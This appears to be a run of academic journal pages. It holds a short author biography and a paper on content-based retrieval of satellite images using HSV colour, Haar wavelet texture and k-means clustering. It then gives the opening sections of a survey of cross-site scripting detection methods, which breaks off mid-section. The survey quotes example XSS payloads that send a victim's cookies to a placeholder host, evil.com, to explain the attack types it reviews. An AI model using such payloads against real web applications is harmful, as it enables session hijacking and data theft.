Dr. Manesh Kokare completed his Ph.D. at IIT Kharagpur, India, in 2005. He is a faculty member in the Department of Electronics and Telecommunication Engineering at Shri Guru Gobind Singhji Institute of Engineering and Technology, Vishnupuri, Nanded, India. He has published about 35 papers in international and national journals and conferences. He received the Career Award for Young Teachers (CAYT) for the year 2005 from AICTE, New Delhi, India. He is a life member of the System Society of India, ISTE, and IETE, and a member of IEEE, the IEEE Signal Processing Society, and the IEEE Computer Society. He is a reviewer for fourteen international journals.
Retrieval of Remote Sensing Images Using Colour & Texture Attributes

Priti Maheswary, Research Scholar, Department of Computer Application, Maulana Azad National Institute of Technology, Bhopal, India, pritimaheshwary@rediffmail.com

Dr. Namita Srivastava, Assistant Professor, Department of Mathematics, Maulana Azad National Institute of Technology, Bhopal, India, sri.namita@gmail.com
Abstract - Grouping images into semantically meaningful categories using low-level visual features is a challenging and important problem in content-based image retrieval. The groupings can be used to build effective indices for an image database. Digital image analysis techniques are widely used in remote sensing on the assumption that each terrain surface category is characterized by a spectral signature observed by remote sensors. Even with remote sensing images of IRS data, the integration of spatial information is expected to assist and improve the analysis of remote sensing data. In this paper we present a satellite image retrieval approach based on a mixture of old-fashioned ideas and state-of-the-art learning tools. We have developed a methodology to classify remote sensing images using HSV colour features and Haar wavelet texture features and then group them on the basis of a particular threshold value. The experimental results indicate that the use of colour and texture feature extraction is very useful for image retrieval.

Key Words: Content Based Image Retrieval; k-means clustering; colour; texture
I. INTRODUCTION
The advent of digital photography, the reduction in the cost of mass storage devices, and the use of high-capacity public networks have led to a rapid increase in the use of digital images in various domains such as publishing, media, the military and education. The need to store, manage and locate these images has become a challenging task. Generally, there are two main approaches to classifying images: image classification based on keywords, and content based image retrieval. The former technique suffers from the need for manual classification of images, which is simply not practical for a large collection of images. Further, the incompleteness of a limited set of keyword descriptors may significantly reduce query effectiveness at the time of image retrieval. In the latter technique, images can be identified by an automatic description that depends on their objective visual content.

Remote sensing images are depicted using the spatial distribution of certain field parameters, such as reflectivity of electromagnetic (EM) radiation, emissivity, temperature, or some geophysical or topographical elevation. We have designed a system to retrieve similar remote sensing images using a mix of traditional and modern approaches.
II. PREVIOUS WORK
Content Based Image Retrieval (CBIR) is a set of techniques for retrieving semantically relevant images from an image database based on automatically derived image features [1]. The computer must be able to retrieve images from a database without any human assumption about the specific domain (such as texture vs. non-texture, or indoor vs. outdoor).

One of the main tasks for CBIR systems is similarity comparison: extracting the feature signatures of every image based on its pixel values and defining rules for comparing images. These features become the image representation for measuring similarity with the other images in the database. To compare images, the difference of the feature components is calculated. Early CBIR methods used global feature extraction to obtain the image descriptors. For example, QBIC [2], developed at the IBM Almaden Research Center, extracts several features from each image, namely color, texture and shape features. These descriptors are obtained globally, by extracting information on the means of color histograms for the color features; global texture information on coarseness, contrast, and direction; and shape features about the curvature, moment invariants, circularity, and eccentricity. Similarly, the Photobook system [3], VisualSeek [4], and Virage [5] use global features to represent image semantics.

The system in [6] attempts to overcome the limitations of global-feature-based retrieval systems by representing images as collections of regions that may correspond to objects such as flowers, trees, skies, and mountains. This system applies image segmentation [7] to decompose an image into regions, which correspond to physical objects (trees, people, cars, flowers) if the decomposition is ideal. The feature descriptors are extracted from each object instead of the global image. Color
and texture features are extracted for each pixel that belongs to the object, and each object is described by the average value of these pixel features. In this paper, color and texture feature extraction, clustering, and similarity matching are used.
III. METHODOLOGY
A system is developed for image retrieval. In this system, an image database of LISS III sensor images is used. LISS III has a spatial resolution of 23 m and a swath width of 140 km. A query image is taken, and images similar to the query image are found on the basis of colour and texture similarity. The three main tasks of the system are:
1. Colour & texture feature extraction.
2. K-means clustering to form groups.
3. Similarity distance computation between the query image and database images.
A. Feature Extraction
We have used the approach of Li and Wang [1] and Zhang [9]. The image is partitioned into 4 by 4 blocks, a size that provides a compromise between texture granularity, segmentation coarseness, and computation time. As part of pre-processing, each 4x4 block is replaced by a single block containing the average value of the 4 by 4 block.
To segment an image into objects, six features are extracted from each block. Three are color features, and the other three are texture features. The HSV color space is selected for color feature extraction because of the ease of transformation from RGB to HSV and vice versa, and because the quantization of HSV can produce a collection of colors that is compact and complete [6]. These three features, {H, S, V}, are extracted from the RGB colour image.

To obtain the texture features, the Haar wavelet transform is used. The Haar wavelet is discontinuous and resembles a step function. The texture features represent the energy in the high frequency bands of the Haar wavelet transform. After a one-level wavelet transform, a 4 by 4 block is decomposed into four frequency bands, each band containing a 2 by 2 matrix of coefficients. Suppose the coefficients in the HL band are {c(k,l), c(k,l+1), c(k+1,l), c(k+1,l+1)}. Then the feature of the block in the HL band is computed as:

f_HL = sqrt( (1/4) * sum over i,j in {0,1} of c(k+i, l+j)^2 )

The other two features are computed similarly in the LH and HH bands. The three texture features of the block are {HL, LH, HH} [6].
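As a rough illustration of the texture features just described (not the authors' MATLAB code; the averaging normalization of the Haar filter is an assumption), a one-level 2-D Haar decomposition of a 4x4 block and the per-band RMS energy can be sketched as:

```python
import numpy as np

def haar_block_features(block):
    """One-level 2-D Haar transform of a 4x4 block; returns the RMS
    energy of the HL, LH and HH bands (three texture features)."""
    b = np.asarray(block, dtype=float).reshape(4, 4)
    # Haar along rows: averages and differences of column pairs
    lo = (b[:, 0::2] + b[:, 1::2]) / 2.0
    hi = (b[:, 0::2] - b[:, 1::2]) / 2.0
    # Haar along columns, producing the four 2x2 bands
    lh = (lo[0::2, :] - lo[1::2, :]) / 2.0
    hl = (hi[0::2, :] + hi[1::2, :]) / 2.0
    hh = (hi[0::2, :] - hi[1::2, :]) / 2.0
    rms = lambda band: float(np.sqrt(np.mean(band ** 2)))
    return rms(hl), rms(lh), rms(hh)

# a flat block has no high-frequency energy at all
print(haar_block_features(np.ones((4, 4))))   # (0.0, 0.0, 0.0)
```

A block with vertical stripes, for example, would show its energy only in the band sensitive to horizontal variation, which is exactly what makes these three values useful as texture descriptors.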
B. K-Means Clustering
A cluster is a collection of data objects that are similar to one another within the same cluster and dissimilar to the objects in other clusters. K-means is well suited for data mining because of its efficiency in processing large data sets. The k-means algorithm is built upon four basic operations:
1. Selection of the initial k means for the k clusters.
2. Calculation of the dissimilarity between an object and the mean of a cluster.
3. Allocation of an object to the cluster whose mean is nearest to the object.
4. Re-calculation of the mean of a cluster from the objects allocated to it, so that the intra-cluster dissimilarity is minimized.

After obtaining the six features from all pixels of the image and storing them in an array, k-means clustering is performed using Borgelt's implementation [10] to group similar pixels together and form k = 3 clusters. The same procedure is applied to every given image.
An advantage of the k-means algorithm is that it works even when clusters are not well separated from each other, which is frequently the case in images. However, k-means requires the user to specify the initial cluster centers.
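The four operations listed above can be sketched as follows (a plain NumPy illustration, not Borgelt's implementation; the deterministic spread-out initialization is an assumption made for reproducibility):

```python
import numpy as np

def kmeans(features, k=3, iters=50):
    """Plain k-means on an (n_points, 6) feature array: assign each point
    to the nearest mean, then recompute the means until they stop moving."""
    x = np.asarray(features, dtype=float)
    centers = x[:: max(1, len(x) // k)][:k].copy()   # simple spread-out init
    for _ in range(iters):
        # Euclidean distance of every point to every center (operation 2)
        d = np.linalg.norm(x[:, None, :] - centers[None, :, :], axis=2)
        labels = d.argmin(axis=1)                     # operation 3
        new = np.array([x[labels == j].mean(axis=0) if np.any(labels == j)
                        else centers[j] for j in range(k)])  # operation 4
        if np.allclose(new, centers):
            break
        centers = new
    return labels, centers

# three well-separated blobs standing in for pixel feature vectors
pts = np.vstack([np.zeros((5, 6)), np.ones((5, 6)), 5 * np.ones((5, 6))])
labels, _ = kmeans(pts, k=3)
print(sorted(set(labels.tolist())))   # [0, 1, 2]
```

As the text notes, the result depends on the initial centers; a poor initialization can merge or split clusters, which is why practical implementations run several restarts.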
C. Similarity Matching
Many similarity measures have been developed for image retrieval based on empirical estimates of the extracted features. Euclidean distance is used for similarity matching in the present system. The Euclidean distance between two points P = (p1, p2, ..., pn) and Q = (q1, q2, ..., qn) in Euclidean n-space is defined as:

d(P, Q) = sqrt( (p1 - q1)^2 + (p2 - q2)^2 + ... + (pn - qn)^2 )

The system calculates the 6 features of each image object and then calculates the Euclidean distance from each object of the given query image to all three objects of each image in the database.
The distance between two images, i.e. between a query image Q with three clustered objects Q/1, Q/2, Q/3 and another image A with clustered objects A/1, A/2, A/3, is approximated as follows:
1. Find the Euclidean distances between object Q/1 and all three objects of A. Let these distances be d1, d2, d3.
2. Find the Euclidean distances between object Q/2 and all three objects of A. Let these distances be d4, d5, d6.
3. Find the Euclidean distances between object Q/3 and all three objects of A. Let these distances be d7, d8, d9.
4. Take M1 as the minimum of the three distances d1, d2, and d3.
5. Take M2 as the minimum of the three distances d4, d5, and d6.
6. Take M3 as the minimum of the three distances d7, d8, and d9.
7. Take the final distance between Q and A as the average of M1, M2, M3, i.e.
Distance (Q, A) = (M1 + M2 + M3)/3.
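Steps 1-7 condense into a min-then-average rule; the following Python sketch mirrors it (the object feature vectors below are hypothetical):

```python
import math

def euclid(p, q):
    """Euclidean distance between two equal-length feature vectors."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(p, q)))

def image_distance(q_objects, a_objects):
    """For each clustered object of the query image take the minimum
    Euclidean distance to any object of image A, then average (steps 1-7)."""
    mins = [min(euclid(qo, ao) for ao in a_objects) for qo in q_objects]
    return sum(mins) / len(mins)

# hypothetical 6-D object feature vectors for a query image Q and an image A
Q = [[0.0] * 6, [1.0] * 6, [2.0] * 6]
A = [[0.0] * 6, [1.0] * 6, [2.0] * 6]
print(image_distance(Q, A))   # 0.0 for identical object sets
```

Taking the minimum per query object makes the measure tolerant to the ordering of the three clusters, which is arbitrary after k-means.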
IV. EXPERIMENTAL PLAN
The image retrieval system is implemented using MATLAB image processing and statistical tools. For the experiment, the system uses 12 remote sensing images of an urban area obtained from the LISS III sensor, each of 128x128 pixels (Figure 4.1), to perform image retrieval.
A. Feature Extraction
Using MATLAB image processing tools, the following steps are performed for feature extraction:
1. Color and texture features are extracted from each pixel as described in Section III-A (H, S, V for colour and HL, LH, HH for texture).
2. The output of the MATLAB code in step one is saved in an Excel file as an array containing 3 columns of color features, 3 columns of texture features, and one row per pixel of each image.
B. K-Means Clustering
The pixel values obtained in step A are clustered using k-means to group similar features together. A sample for image 1 is shown in Table 4.1. As can be seen in this table, pixels 1 to 17 belong to cluster 2 and pixel 18 belongs to cluster 1.
Fig. 4.1: Images taken as example images
PNo H S V HL LH HH C1 C2 C3
1 0 0.12 0.44 -1 1 0 0 1 0
2 0.7 0.05 0.66 0 -1 1 0 1 0
3 0.86 0.08 0.76 0 -1 1 0 1 0
4 0.61 0.11 0.8 -32 32 32 0 1 0
5 0.7 0.09 0.87 -32 32 32 0 1 0
6 0.66 0.08 0.9 -33 -31.5 -31.5 0 1 0
7 0.59 0.13 0.78 31 72 32 0 1 0
8 0.56 0.17 0.75 31 72 32 0 1 0
9 0.6 0.1 0.67 0 0 142 0 1 0
10 0.51 0.09 0.64 0 0 142 0 1 0
11 0.54 0.08 0.58 -20 21.5 162 0 1 0
12 0.43 0.2 0.49 -20 21.5 162 0 1 0
13 0.47 0.4 0.64 20 20 -159 1 0 0
14 0.48 0.39 0.52 20 20 -159 1 0 0
15 0.47 0.2 0.38 1 -0.5 0.5 0 1 0
16 0.75 0.04 0.42 1 -0.5 0.5 0 1 0
17 0.97 0.15 0.57 2 -0.5 -0.5 0 1 0
18 0.96 0.21 0.66 -4 -136 -2.5 1 0 0
Table 4.1 Clustering Result
Table 4.2: Distance between image 1 and all other images

Image:    1 | 2    | 3    | 4    | 5    | 6    | 7    | 8    | 9    | 10   | 11   | 12
Distance: 0 | 0.21 | 0.08 | 0.18 | 0.17 | 0.19 | 0.17 | 0.17 | 0.27 | 0.16 | 0.17 | 0.21
C. Similarity Matching
Images similar to the query image are retrieved. The distance of image 1 from all the other images is calculated using Euclidean distance. The final distances between query image 1 and all the other images in the database are shown in Table 4.2. The distance from image 1 to image 2 is 0.211575, while the distance from image 1 to image 7 is 0.174309.

Considering image 4 as the query, Table 4.3 shows the distances (threshold between 0 and 0.1) to the closest images. It is clear from the table that image 11 is closest to image 4.
Image:    4 | 5     | 6     | 10   | 11
Distance: 0 | 0.079 | 0.097 | 0.11 | 0.077

Table 4.3: Distance between image 4 and the closest similar images
Fig: 4.2: Similar images of query image 4.
Considering image 3 as the query, Table 4.4 shows the distances (between 0 and 0.2) to the closest images. It is clear from the table that image 1 is closest to image 3.

Image:    3 | 1       | 2       | 12
Distance: 0 | 0.08195 | 0.19374 | 0.173131

Table 4.4: Distance between image 3 and the closest similar images
V. CONCLUSION
To retrieve images similar to a given query image, we perform segmentation of the images using color & texture features, then cluster the image features, and finally calculate the similarity distance. Color feature extraction is done in the HSV color space and texture feature extraction is done with the Haar wavelet transform. Grouping of objects in the data is performed using the k-means clustering algorithm. Similarity matching of images is based on Euclidean distance. We obtained fruitful results on the example images used in the experiments. This technique can be used for mining similar images based on content, and as a knowledge base for finding vegetation, water or building areas.
VI. REFERENCES
[1] Li, J., Wang, J. Z. and Wiederhold, G., "Integrated Region Matching for Image Retrieval," ACM Multimedia, 2000, pp. 147-156.
[2] Flickner, M., Sawhney, H., Niblack, W., Ashley, J., Huang, Q., Dom, B., Gorkani, M., Hafner, J., Lee, D., Petkovic, D., Steele, D. and Yanker, P., "Query by image and video content: The QBIC system," IEEE Computer, 28(9), 1995, pp. 23-32.
[3] Pentland, A., Picard, R. and Sclaroff, S., "Photobook: Content-based manipulation of image databases," International Journal of Computer Vision, 18(3), 1996, pp. 233-254.
[4] Smith, J. R. and Chang, S. F., "Single color extraction and image query," In Proceedings of the IEEE International Conference on Image Processing, 1997, pp. 528-531.
[5] Gupta, A. and Jain, R., "Visual information retrieval," Comm. Assoc. Comp. Mach., 40(5), 1997, pp. 70-79.
[6] Eka Aulia, "Hierarchical Indexing for Region-based Image Retrieval," a thesis submitted to the Graduate Faculty of the Louisiana State University and Agricultural and Mechanical College.
[7] Shi, J. and Malik, J., "Normalized Cuts and Image Segmentation," Proceedings of Computer Vision and Pattern Recognition, June 1997, pp. 731-737.
[8] Smith, J., "Color for Image Retrieval," Image Databases: Search and Retrieval of Digital Imagery, John Wiley & Sons, New York, 2001, pp. 285-311.
[9] Zhang, R. and Zhang, Z., "A Clustering Based Approach to Efficient Image Retrieval," Proceedings of the 14th IEEE International Conference on Tools with Artificial Intelligence, 2002, pp. 339.
[10] http://fuzzy.cs.uni-magdeburg.de/~borgelt/software for k-means clustering software.
Consideration Points: Detecting Cross-Site Scripting

Suman Saha
Dept. of Computer Science and Engineering
Hanyang University, Ansan, South Korea
sumsaha@gmail.com
Abstract—Web applications (WA) have expanded their usage to provide more and more services, and they have become one of the most essential communication channels between service providers and users. To augment the users' experience, many web applications use client-side scripting languages such as JavaScript, but this growth of JavaScript is also introducing serious security vulnerabilities in web applications, such as cross-site scripting (XSS). In this paper, I survey the techniques that have been used to detect XSS and arrange a number of analyses to evaluate the performance of those methodologies. This paper points out the major difficulties in detecting XSS. I do not implement any solution to this vulnerability problem, because my focus is on reviewing the issue; but I believe this assessment will be useful for further research on this concern, as it lays out this prominent security problem in full.

Keywords—cross-site scripting, injection attack, JavaScript, scripting language security, survey, web application security
I. INTRODUCTION
In this modern world, the web application (WA) has expanded its usage to provide more and more services, and it has become one of the most essential communication channels between service providers and users. To augment the users' experience, many web applications use client-side scripting languages such as JavaScript, but this growth of JavaScript is also introducing serious security vulnerabilities in web applications. The topmost threat among those vulnerabilities is cross-site scripting (XSS): 21.5% of newly reported vulnerabilities were XSS, making it the most frequently reported security threat in 2006 [29, 30].

A class of scripting code is injected into dynamically generated pages of trusted sites to transfer sensitive data to a third party (i.e., the attacker's server), evading the same-origin policy or cookie protection mechanisms in order to allow attackers to access confidential data. XSS usually affects the victim's web browser on the client side, whereas SQL injection, a related web vulnerability, involves the server side. It is therefore thorny for the operator of a web application to trace XSS holes. Moreover, no particular application knowledge or knack is required for an attacker to reveal the exploits. Additionally, Wassermann and Su's paper identifies several factors that contribute to the prevalence of XSS vulnerabilities [29]. First, the system requirements for XSS are minimal. Second, most web application programming languages provide an unsafe default for passing untrusted input to the client. Finally, proper validation of untrusted input is difficult to get right, primarily because of the many, often browser-specific, ways of invoking the JavaScript interpreter. Therefore, we may say that inadequate validation of user input is the key reason for cross-site scripting (XSS), and that an effective input validation approach could be introduced to detect XSS vulnerabilities in a WA. But this is not always true: I found a number of situations during my survey in which input validation alone is not sufficient to prevent XSS. Several techniques have been developed to detect this injection problem; some are handled dynamically and some statically. Every researcher has tried to present a more competent and effectual methodology than previous work, but in my view every method has pros and cons.

The rest of this paper is structured as follows. Section II presents the nuts and bolts of this area and tries to show why cross-site scripting is trickier and more uncanny than other injection problems. I review several research papers, journals, related websites, and more than a thousand XSS vectors, and summarize all of them under one frame in Section III. After reviewing the existing systems, I found at least one problem in each system and categorized the major problems into five broad categories; a brief presentation of these categories, with some realistic examples, is given in Section IV. Section V analyzes ten well-known methodologies that have been used to detect cross-site scripting and examines how they fare with regard to my five problem categories. Finally, Section VI concludes.
II. XSS ATTACK TYPES
There are three distinct types of XSS attacks: non-persistent, persistent, and DOM-based [8].

Non-persistent cross-site scripting is the most common type of vulnerability. The attack code is not persistently stored but, instead, is immediately reflected back to the user. For instance, consider a search form that includes the search query in the results page without filtering the query for scripting code. This vulnerability can be exploited, for example, by sending the victim an email with a specially crafted link pointing to the search form and containing malicious JavaScript code. By tricking the victim into clicking this link, the search form is submitted with the JavaScript code as the query string, and the attack script is immediately sent back to the victim as part of the results page. As another example, consider the case of a user who accesses the popular trusted.com web site to perform sensitive operations
(e.g., on-line banking). The web-based application on trusted.com uses a cookie to store sensitive session information in the user's browser. Note that, because of the same-origin policy, this cookie is accessible only to JavaScript code downloaded from a trusted.com web server. However, the user may also be browsing a malicious web site, say www.evil.com, and could be tricked into clicking on the following link:

<a href="http://www.trusted.com/<SCRIPT>
document.location='http://www.evil.com/steal-cookie.php?'+document.cookie;
</SCRIPT>">Click here to collect prize.
</a>

Figure 1. JavaScript code in an HTTP request
When the user clicks on the link, an HTTP request is sent by the user's browser to the www.trusted.com web server, requesting the page:

<SCRIPT>
document.location='http://www.evil.com/steal-cookie.php?'+document.cookie;
</SCRIPT>

Figure 2. JavaScript code, treated as the requested link
The trusted.com web server receives the request and checks whether it has the resource being requested. When the trusted.com host does not find the requested page, it returns an error message, and it may decide to include the requested file name in that message. In that case the requested file name (which is actually a script) will be sent from the trusted.com web server to the user's browser and will be executed in the context of the trusted.com origin. When the script is executed, the cookie set by trusted.com is sent to the malicious web site as a parameter of the invocation of the steal-cookie.php server-side script. The cookie will be saved and can then be used by the owner of the evil.com site to impersonate the unsuspecting user with respect to trusted.com.
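The root cause in this scenario is that the untrusted file name is echoed into the error page unescaped. A minimal Python sketch (the render_error helper is hypothetical) of how HTML-entity escaping would neutralize such a reflected payload:

```python
import html

def render_error(requested_path):
    """Hypothetical error page that echoes the requested file name.
    Escaping the untrusted value keeps injected <SCRIPT> tags inert."""
    unsafe = "<p>Not found: " + requested_path + "</p>"            # vulnerable
    safe = "<p>Not found: " + html.escape(requested_path) + "</p>"  # escaped
    return unsafe, safe

payload = ("<SCRIPT>document.location='http://www.evil.com/"
           "steal-cookie.php?'+document.cookie;</SCRIPT>")
unsafe, safe = render_error(payload)
print("<SCRIPT>" in unsafe)   # True  - the script tag reaches the browser
print("<SCRIPT>" in safe)     # False - rendered as harmless text
```

Escaping at the output sink, rather than filtering at the input, is the general pattern that later sections of the survey revisit.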
The persistent type stores malicious code persistently in a resource managed by the server (a database, file system, or other location), from which it is later displayed to users without being encoded using HTML entities. For instance, consider an online message board where users can post messages and others can access them later, and assume further that the application does not remove script content from posted messages. In this case, the attacker can craft a message similar to the following example. The message contains malicious JavaScript code that the online message board stores in its database. A visiting user who reads the message retrieves the scripting code as part of the message. The user's browser then executes the script, which, in turn, sends the user's sensitive information from his site to the attacker's site.

Yahoooo! You won a prize. Click on HERE to verify.
<SCRIPT>document.images[0].src =
'http://evil.com/images.jpg?stolencookie' + document.cookie;
</SCRIPT>

Figure 3. Persistent XSS vector
DOM-based cross-site scripting attacks are performed by modifying the DOM "environment" on the client side instead of sending any malicious code to the server, so the server gets no chance to verify the payload. In the following example, the sign (#) means that everything after it is the fragment, i.e. not part of the query:

http://www.evil.com/Home.html#name=<SCRIPT>alert('XSS')</SCRIPT>

Figure 4. DOM-based XSS vector

The browser does not send the fragment to the server, so the server only sees the equivalent of http://www.evil.com/Home.html, not the infected part of the payload. We see, therefore, that this evasion technique causes the major browsers not to send the malicious payload to the server. As a consequence, even well-planned server-side XSS filters become impotent against such attacks.
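This behaviour can be checked directly: standard URL parsing separates the fragment from the path, and only the path and query appear in the HTTP request line. A small Python illustration:

```python
from urllib.parse import urlsplit

# The fragment (everything after '#') never leaves the browser, so a
# DOM-based payload hidden there is invisible to server-side XSS filters.
url = "http://www.evil.com/Home.html#name=<SCRIPT>alert('XSS')</SCRIPT>"
parts = urlsplit(url)

request_target = parts.path          # what the HTTP request line carries
print(request_target)                # /Home.html
print(parts.fragment)                # name=<SCRIPT>alert('XSS')</SCRIPT>
```

Any defence against DOM-based XSS therefore has to run in the client, where the fragment is actually visible.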
As Grossman, RSNAKE, PDP, Rager, and Fogie point out, cross-site scripting is a variegated problem that will not be easy to solve anytime soon [14]. As with other security-related issues, there is no quick fix acceptable to the majority. They characterize the problem as two-fold. First, browsers are not secure by design: they are simply built to produce output in response to requests, and it is not a browser's main duty to determine whether a piece of code is doing something malicious. Second, web application developers are unable to create secure sites because of lacking programming skill or tight time margins. As a consequence, attackers get chances to exploit application vulnerabilities, and users are left stuck between these two unfortunate states.
III. EXISTING METHODS
A. Dynamic Approach
1) Vulnerability Analysis based Approach:
a) Interpreter-based Approaches: Pietraszek and Berghe instrument the interpreter to track untrusted data at the character level, and they identify vulnerabilities using context-sensitive string evaluation at each susceptible sink [18]. This approach is sound and can detect vulnerabilities, because it adds its security assurance by modifying the interpreter itself. However, modifying the interpreter is not easily applicable to some other web programming languages, such as Java (i.e., JSP and servlets) [2].
b) Syntactical Structure Analysis: A successful injection attack changes the syntactical structure of the exploited entity,
as stated by Su and Wassermann in [2], and they present an approach that checks the syntactic structure of the output string to detect a malicious payload. They augment the user input with metadata in order to track the sub-string from source to sinks. This metadata helps the modified parser check the syntactical structure of the dynamically generated string by indicating the start and end positions of the user-given data; if there is any abnormality, further processing is blocked. The process is quite successful at detecting injection vulnerabilities other than XSS. However, checking the syntactic structure alone is not sufficient to prevent the sort of workflow vulnerabilities that are caused by the interaction of multiple modules [25].
2) Attack Prevention Approach:
a) Proxy-based Solution: Noxes, a web proxy, protects against the transfer of sensitive information from the victim's site to a third party's site [13]. It is an application-level firewall that blocks and detects malware. The user is provided with fine-grained control over every connection coming to or leaving the local machine; if a connection does not match the firewall's rules, the firewall prompts the user to decide whether the connection should be blocked or allowed. Almost similar approaches are applied in [12], [24], and [27]. Blacklisting links is not a sufficient technique to prevent cross-site scripting attacks that do not violate the same-origin policy, as was the case with the Samy worm [10]. Huang et al. state that a proxy-based solution presents no procedure for identifying the errors themselves and needs watchful configuration [6]. Systems of this sort guard against the unpredictable link without examining the underlying fault, which may increase false positives [28].
b) Browser-Enforced Embedded Policies: A whitelist of all benign scripts is given by the web application to the browser to protect against malicious code [10]. This smart idea allows only the listed scripts to run. Because there is no uniformity between different browsers' parsing mechanisms, a filtering system that succeeds in one browser may fail in another, and the method of this paper handles that situation quite well. However, enforcing the policy in the browser requires modifying the browser, so the approach suffers a scalability problem from the web application's point of view [11]: every client needs to run this modified version of the browser.
B. Static Analysis
1) Taint Propagation Analysis: Many static and dynamic approaches use taint propagation analysis, built on data-flow analysis, to track information flow from source to sink [4, 6, 9, 22, 26]. The underlying assumption of this technique is as follows: if a sanitization operation is performed on all paths from sources to sinks, then the application is secure [19]. Trusting the user's filter and never checking the sanitization function itself is a poor idea, because some XSS vectors can easily bypass many strong filters. Thus, the technique alone does not provide a strong security mechanism [2].
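The source-to-sink idea can be made concrete with a toy sketch. This is our own illustration of the general taint-propagation assumption, not the instrumentation of [18] or any surveyed tool; the Tainted class and htmlSink function are hypothetical names.

```javascript
// Toy illustration of taint propagation: untrusted input is wrapped with a
// taint flag that survives concatenation, and a sensitive sink checks the
// flag before emitting output.
class Tainted {
  constructor(value, tainted = true) {
    this.value = value;
    this.tainted = tainted;
  }
  concat(other) {
    const v = this.value + (other instanceof Tainted ? other.value : other);
    const t = this.tainted || (other instanceof Tainted && other.tainted);
    return new Tainted(v, t); // taint propagates through the operation
  }
}

function htmlSink(fragment) {
  // Check at the sink: refuse tainted markup wholesale.
  if (fragment instanceof Tainted && fragment.tainted) {
    throw new Error('tainted data reached an HTML sink unsanitized');
  }
  return fragment instanceof Tainted ? fragment.value : fragment;
}

const userInput = new Tainted('<SCRIPT>steal()</SCRIPT>'); // from a request
const page = new Tainted('<p>Hello ', false).concat(userInput);

let blocked = false;
try { htmlSink(page); } catch (e) { blocked = true; }
console.log(blocked); // true: the taint survived the concatenation
```

The sketch also shows the technique's blind spot noted above: if a trusted-but-weak filter simply cleared the taint flag, the sink would accept the payload unexamined.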
2) String Analysis: The study of string analysis grew out of the study of text-processing programs. XDuce, a language designed for XML transformations, uses formal languages (e.g., regular languages) [31]. Christensen, Møller, and Schwartzbach introduced static string analysis for imperative (real-world) languages by showing the usefulness of string analysis for analyzing reflective code in Java programs and checking for errors in dynamically generated SQL queries [7]. They designed an analysis for Java using finite state automata (FSA) as its target language representation, and they applied techniques from computational linguistics to generate good FSA approximations of context-free grammars (CFGs) [32]. Their analysis, however, does not track the source of data, and because it must determine the FSA between each operation, it is less efficient than other string analyses and not practical for finding XSS vulnerabilities [29]. Minamide followed the same technique to design a string analysis for PHP that does not approximate CFGs to FSA. His proposed technique checks the whole document for the presence of the "<script>" tag. Because web applications often include their own scripts, and because many other ways of invoking the JavaScript interpreter exist, this approach is not practical for finding XSS vulnerabilities either.
3) Preventing XSS Using Untrusted Scripts: Using a list of untrusted scripts to detect harmful script in user-given data is a well-known technique, and Wassermann and Su's recent work [29] is a shade of this process. They build policies and generate regular expressions of untrusted tags; if there is a non-empty intersection between the generated regular expression and the CFG produced by string-taint static analysis, they take further action. We believe that using any list of untrusted scripts is an easy but poor idea. The same opinion is stated in the OWASP document [17]: "Do not use 'blacklist' validation to detect XSS in input or to encode output. Searching for and replacing just a few characters ('<', '>' and other similar characters or phrases such as 'script') is weak and has been attacked successfully. XSS has a surprising number of variants that make it easy to bypass blacklist validation."
4) Software Testing Techniques: Y. Huang, S. Huang, Lin, and Tsai apply a number of software-testing techniques, such as black-box testing, fault injection, and behavior monitoring, to web applications in order to deduce the presence of vulnerabilities [15]. It is a combination of user-behavior simulation and user-experience modeling as black-box testing [28]. Similar approaches are used in several commercial products such as AppScan [21], WebInspect [20], and ScanDo [23]. Since these approaches are applied to identify errors during the development cycle, they may be unable to provide instant web application protection [6], and they cannot guarantee the detection of all flaws either [27].
5) Bounded Model Checking: Huang et al. use counterexample traces to reduce the number of inserted sanitization routines and to identify the causes of errors, which increases the precision of both error reports and code instrumentation [28]. To verify legal information flow within web application programs, they assign states that represent variables' current trust levels. Bounded model checking is then used to verify the correctness of all
possible safety states of the abstract interpretation of the program. Their method, however, leaves out alias analysis and include-file resolution, which are among the major open problems in most current systems [26].
C. Static and Dynamic Analysis Combination
1) Lattice-based Analysis: WebSSARI is a tool combining static and runtime features that applies static taint propagation analysis to find security vulnerabilities [6]. On the basis of a lattice model and typestate, the tool uses a flow-sensitive, intra-procedural analysis to detect vulnerabilities, and it automatically inserts runtime guards, i.e., sanitization routines, when it determines that tainted data reaches sensitive functions [25]. The major problem of this method is that it produces large numbers of false positives and false negatives due to its intraprocedural, type-based analysis [4]. Moreover, the method considers the results of user-designed filters to be safe; it may therefore miss real vulnerabilities, because the designated filtering function may be unable to detect the malicious payload.
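The danger of trusting a user-designed filter can be illustrated with a sketch (ours, not WebSSARI's actual guard): a filter that strips <script> blocks passes an event-handler vector through untouched, so an analysis that trusts the filter reports the page as safe while it is not.

```javascript
// Hypothetical user-supplied filter of the kind a trusting analysis would
// accept as a sanitizer: it strips <script>...</script> blocks but knows
// nothing about event-handler attributes.
function userFilter(input) {
  return input.replace(/<script[\s\S]*?<\/script>/gi, '');
}

// A classic event-handler vector carries no <script> tag at all:
const vector = '<img src=x onerror=alert(document.cookie)>';
const result = userFilter(vector);

// The filter passes the vector through completely unchanged.
console.log(result === vector); // true
```

Any analysis that marks data "sanitized" merely because it passed through userFilter will miss this real vulnerability, which is exactly the failure mode described above.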
IV. CONSIDERATION POINTS TO DETECT XSS
After close examination of the existing detectors, I found at least one problem in each. Those problems fall into five categories; a brief description of the categories, along with some realistic examples, is given in this section.
A. Insecure JavaScript Practice
Yue et al. characterize the insecure engineering practices of JavaScript inclusion and dynamic generation at different websites by examining the severity and nature of the resulting security vulnerabilities [3]. These two insecure practices are the main avenues for injecting malicious code into websites and creating XSS vectors. According to their survey results, 66.4% of the measured websites follow the insecure practice of JavaScript inclusion: using the src attribute of a script tag to include a JavaScript file from an external domain in the top-level document of a web page. (The top-level document is the document loaded from the URL displayed in the browser's address bar.) Two domain names are regarded as different only if, after discarding their top-level domain names (e.g., .com) and the leading name "www" (if present), they have no common sub-domain name. For instance, the two domain names below are regarded as different only if the intersection of the two sets {d1sub2.d1sub1} and {d2sub3.d2sub2.d2sub1} is empty [3].
1. www.d1sub2.d1sub1.d1tld
2. d2sub3.d2sub2.d2sub1.d2tld
